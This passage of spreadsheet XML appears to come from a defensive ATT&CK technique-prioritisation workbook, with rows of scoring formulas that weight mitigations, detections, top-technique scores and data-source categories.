      <c r="AD409" s="50" t="s">
        <v>1441</v>
      </c>
      <c r="AE409" s="37" t="str" cm="1">
        <f t="array" ref="AE409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD409)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF409" s="37">
        <v>405</v>
      </c>
      <c r="AG409" s="37" t="str" cm="1">
        <f t="array" ref="AG409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD409)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH409" s="37">
        <v>405</v>
      </c>
      <c r="AI409" s="37" t="str" cm="1">
        <f t="array" ref="AI409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD409)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ409" s="37">
        <v>405</v>
      </c>
      <c r="AK409" s="37" t="str" cm="1">
        <f t="array" ref="AK409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD409)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL409" s="37">
        <v>405</v>
      </c>
      <c r="AM409" s="37" t="str" cm="1">
        <f t="array" ref="AM409">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD409)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN409" s="37">
        <v>0</v>
      </c>
      <c r="AO409" s="37">
        <v>0</v>
      </c>
      <c r="AP409" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ409" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>74.617511777777779</v>
      </c>
      <c r="AR409" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS409" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT409" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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10" spans="1:47" ht="34">
      <c r="A410" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B410" s="37">
        <f t="shared" si="6"/>
        <v>177.97619047619048</v>
      </c>
      <c r="C410" s="37" t="s">
        <v>1442</v>
      </c>
      <c r="D410" s="50" t="s">
        <v>1430</v>
      </c>
      <c r="E410" s="37" t="s">
        <v>1443</v>
      </c>
      <c r="F410" s="37">
        <v>1</v>
      </c>
      <c r="G410" s="37">
        <v>1</v>
      </c>
      <c r="H410" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I410" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J410" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K410" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L410" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M410" s="37">
        <v>0</v>
      </c>
      <c r="N410" s="56">
        <v>0</v>
      </c>
      <c r="O410" s="56">
        <v>1</v>
      </c>
      <c r="P410" s="56">
        <v>0</v>
      </c>
      <c r="Q410" s="56">
        <v>1</v>
      </c>
      <c r="R410" s="57"/>
      <c r="S410" s="57">
        <v>0</v>
      </c>
      <c r="T410" s="57" t="s">
        <v>1444</v>
      </c>
      <c r="U410" s="57">
        <v>0</v>
      </c>
      <c r="V410" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W410" s="37">
        <v>0</v>
      </c>
      <c r="X410" s="37">
        <v>0</v>
      </c>
      <c r="Y410" s="37">
        <v>0</v>
      </c>
      <c r="Z410" s="37">
        <v>2</v>
      </c>
      <c r="AA410" s="37">
        <v>0.02</v>
      </c>
      <c r="AB410" s="37">
        <v>0.02</v>
      </c>
      <c r="AC410" s="37"/>
      <c r="AD410" s="50" t="s">
        <v>1435</v>
      </c>
      <c r="AE410" s="37" t="str" cm="1">
        <f t="array" ref="AE410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD410)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF410" s="37">
        <v>406</v>
      </c>
      <c r="AG410" s="37" t="str" cm="1">
        <f t="array" ref="AG410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD410)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH410" s="37">
        <v>406</v>
      </c>
      <c r="AI410" s="37" t="str" cm="1">
        <f t="array" ref="AI410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD410)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ410" s="37">
        <v>406</v>
      </c>
      <c r="AK410" s="37" t="str" cm="1">
        <f t="array" ref="AK410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD410)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL410" s="37">
        <v>406</v>
      </c>
      <c r="AM410" s="37" t="str" cm="1">
        <f t="array" ref="AM410">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD410)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN410" s="37">
        <v>0</v>
      </c>
      <c r="AO410" s="37"/>
      <c r="AP410" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ410" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.32539682539683</v>
      </c>
      <c r="AR410" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS410" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT410" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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11" spans="1:47" ht="34">
      <c r="A411" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B411" s="37">
        <f t="shared" si="6"/>
        <v>287.01428571428568</v>
      </c>
      <c r="C411" s="37" t="s">
        <v>1445</v>
      </c>
      <c r="D411" s="50" t="s">
        <v>1430</v>
      </c>
      <c r="E411" s="37" t="s">
        <v>1446</v>
      </c>
      <c r="F411" s="37">
        <v>1</v>
      </c>
      <c r="G411" s="37">
        <v>1</v>
      </c>
      <c r="H411" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I411" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J411" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K411" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L411" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M411" s="37">
        <v>0</v>
      </c>
      <c r="N411" s="56">
        <v>0</v>
      </c>
      <c r="O411" s="56">
        <v>2</v>
      </c>
      <c r="P411" s="56">
        <v>9</v>
      </c>
      <c r="Q411" s="56">
        <v>5</v>
      </c>
      <c r="R411" s="57"/>
      <c r="S411" s="57">
        <v>0</v>
      </c>
      <c r="T411" s="57" t="s">
        <v>1447</v>
      </c>
      <c r="U411" s="57">
        <v>0</v>
      </c>
      <c r="V411" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W411" s="37">
        <v>0</v>
      </c>
      <c r="X411" s="37">
        <v>0</v>
      </c>
      <c r="Y411" s="37">
        <v>0</v>
      </c>
      <c r="Z411" s="37">
        <v>16</v>
      </c>
      <c r="AA411" s="37">
        <v>0.16</v>
      </c>
      <c r="AB411" s="37">
        <v>0.16</v>
      </c>
      <c r="AC411" s="37"/>
      <c r="AD411" s="50" t="s">
        <v>1441</v>
      </c>
      <c r="AE411" s="37" t="str" cm="1">
        <f t="array" ref="AE411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD411)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF411" s="37">
        <v>407</v>
      </c>
      <c r="AG411" s="37" t="str" cm="1">
        <f t="array" ref="AG411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD411)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH411" s="37">
        <v>407</v>
      </c>
      <c r="AI411" s="37" t="str" cm="1">
        <f t="array" ref="AI411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD411)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ411" s="37">
        <v>407</v>
      </c>
      <c r="AK411" s="37" t="str" cm="1">
        <f t="array" ref="AK411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD411)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL411" s="37">
        <v>407</v>
      </c>
      <c r="AM411" s="37" t="str" cm="1">
        <f t="array" ref="AM411">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD411)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN411" s="37">
        <v>0</v>
      </c>
      <c r="AO411" s="37"/>
      <c r="AP411" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ411" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>95.671428571428564</v>
      </c>
      <c r="AR411" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS411" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT411" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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12" spans="1:47" ht="34">
      <c r="A412" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B412" s="37">
        <f t="shared" si="6"/>
        <v>163.30000000000001</v>
      </c>
      <c r="C412" s="37" t="s">
        <v>3795</v>
      </c>
      <c r="D412" s="50" t="s">
        <v>1430</v>
      </c>
      <c r="E412" s="37" t="s">
        <v>3796</v>
      </c>
      <c r="F412" s="37">
        <v>1</v>
      </c>
      <c r="G412" s="37">
        <v>1</v>
      </c>
      <c r="H412" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I412" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J412" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K412" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L412" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M412" s="37">
        <v>0</v>
      </c>
      <c r="N412" s="56">
        <v>0</v>
      </c>
      <c r="O412" s="56">
        <v>0</v>
      </c>
      <c r="P412" s="56">
        <v>0</v>
      </c>
      <c r="Q412" s="56">
        <v>0</v>
      </c>
      <c r="R412" s="57"/>
      <c r="S412" s="57"/>
      <c r="T412" s="57"/>
      <c r="U412" s="57"/>
      <c r="V412" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W412" s="37"/>
      <c r="X412" s="37"/>
      <c r="Y412" s="37"/>
      <c r="Z412" s="37"/>
      <c r="AA412" s="37"/>
      <c r="AB412" s="37"/>
      <c r="AC412" s="37"/>
      <c r="AD412" s="50" t="s">
        <v>1133</v>
      </c>
      <c r="AE412" s="37" t="str" cm="1">
        <f t="array" ref="AE412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD412)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF412" s="37">
        <v>408</v>
      </c>
      <c r="AG412" s="37" t="str" cm="1">
        <f t="array" ref="AG412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD412)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH412" s="37">
        <v>408</v>
      </c>
      <c r="AI412" s="37" t="str" cm="1">
        <f t="array" ref="AI412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD412)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ412" s="37">
        <v>408</v>
      </c>
      <c r="AK412" s="37" t="str" cm="1">
        <f t="array" ref="AK412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD412)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL412" s="37">
        <v>408</v>
      </c>
      <c r="AM412" s="37" t="str" cm="1">
        <f t="array" ref="AM412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD412)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN412" s="37"/>
      <c r="AO412" s="37"/>
      <c r="AP412" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ412" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.433333333333337</v>
      </c>
      <c r="AR412" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS412" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT412" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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13" spans="1:47" ht="136">
      <c r="A413" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B413" s="37">
        <f t="shared" si="6"/>
        <v>647.0044500952381</v>
      </c>
      <c r="C413" s="37" t="s">
        <v>1448</v>
      </c>
      <c r="D413" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E413" s="37"/>
      <c r="F413" s="37">
        <v>1</v>
      </c>
      <c r="G413" s="37">
        <v>1</v>
      </c>
      <c r="H413" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I413" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J413" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K413" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L413" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M413" s="37">
        <v>0</v>
      </c>
      <c r="N413" s="56">
        <v>0</v>
      </c>
      <c r="O413" s="56">
        <v>0</v>
      </c>
      <c r="P413" s="56">
        <v>0</v>
      </c>
      <c r="Q413" s="56">
        <v>0</v>
      </c>
      <c r="R413" s="57" t="s">
        <v>1450</v>
      </c>
      <c r="S413" s="57">
        <v>15</v>
      </c>
      <c r="T413" s="57" t="s">
        <v>1451</v>
      </c>
      <c r="U413" s="57">
        <v>16</v>
      </c>
      <c r="V413" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29523790476190481</v>
      </c>
      <c r="W413" s="37">
        <v>31</v>
      </c>
      <c r="X413" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y413" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z413" s="37">
        <v>0</v>
      </c>
      <c r="AA413" s="37">
        <v>0</v>
      </c>
      <c r="AB413" s="37">
        <v>0</v>
      </c>
      <c r="AC413" s="37"/>
      <c r="AD413" s="50" t="s">
        <v>1452</v>
      </c>
      <c r="AE413" s="37" t="str" cm="1">
        <f t="array" ref="AE413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD413)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF413" s="37">
        <v>409</v>
      </c>
      <c r="AG413" s="37" t="str" cm="1">
        <f t="array" ref="AG413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD413)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH413" s="37">
        <v>409</v>
      </c>
      <c r="AI413" s="37" t="str" cm="1">
        <f t="array" ref="AI413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD413)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ413" s="37">
        <v>409</v>
      </c>
      <c r="AK413" s="37" t="str" cm="1">
        <f t="array" ref="AK413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD413)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL413" s="37">
        <v>409</v>
      </c>
      <c r="AM413" s="37" t="str" cm="1">
        <f t="array" ref="AM413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD413)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN413" s="37">
        <v>0</v>
      </c>
      <c r="AO413" s="37">
        <v>0</v>
      </c>
      <c r="AP413" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ413" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>215.66815003174602</v>
      </c>
      <c r="AR413" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS413" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT413" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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14" spans="1:47" ht="51">
      <c r="A414" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B414" s="37">
        <f t="shared" si="6"/>
        <v>593.88547985714285</v>
      </c>
      <c r="C414" s="37" t="s">
        <v>1453</v>
      </c>
      <c r="D414" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E414" s="37" t="s">
        <v>1454</v>
      </c>
      <c r="F414" s="37">
        <v>1</v>
      </c>
      <c r="G414" s="37">
        <v>1</v>
      </c>
      <c r="H414" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I414" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J414" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K414" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L414" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M414" s="37">
        <v>0</v>
      </c>
      <c r="N414" s="56">
        <v>0</v>
      </c>
      <c r="O414" s="56">
        <v>3</v>
      </c>
      <c r="P414" s="56">
        <v>0</v>
      </c>
      <c r="Q414" s="56">
        <v>0</v>
      </c>
      <c r="R414" s="57" t="s">
        <v>1455</v>
      </c>
      <c r="S414" s="57">
        <v>12</v>
      </c>
      <c r="T414" s="57" t="s">
        <v>1456</v>
      </c>
      <c r="U414" s="57">
        <v>14</v>
      </c>
      <c r="V414" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.26190461904761908</v>
      </c>
      <c r="W414" s="37">
        <v>26</v>
      </c>
      <c r="X414" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y414" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z414" s="37">
        <v>3</v>
      </c>
      <c r="AA414" s="37">
        <v>0.03</v>
      </c>
      <c r="AB414" s="37">
        <v>0.03</v>
      </c>
      <c r="AC414" s="37"/>
      <c r="AD414" s="50" t="s">
        <v>1457</v>
      </c>
      <c r="AE414" s="37" t="str" cm="1">
        <f t="array" ref="AE414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD414)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF414" s="37">
        <v>410</v>
      </c>
      <c r="AG414" s="37" t="str" cm="1">
        <f t="array" ref="AG414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD414)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH414" s="37">
        <v>410</v>
      </c>
      <c r="AI414" s="37" t="str" cm="1">
        <f t="array" ref="AI414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD414)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ414" s="37">
        <v>410</v>
      </c>
      <c r="AK414" s="37" t="str" cm="1">
        <f t="array" ref="AK414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD414)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL414" s="37">
        <v>410</v>
      </c>
      <c r="AM414" s="37" t="str" cm="1">
        <f t="array" ref="AM414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD414)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN414" s="37">
        <v>0</v>
      </c>
      <c r="AO414" s="37">
        <v>0</v>
      </c>
      <c r="AP414" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
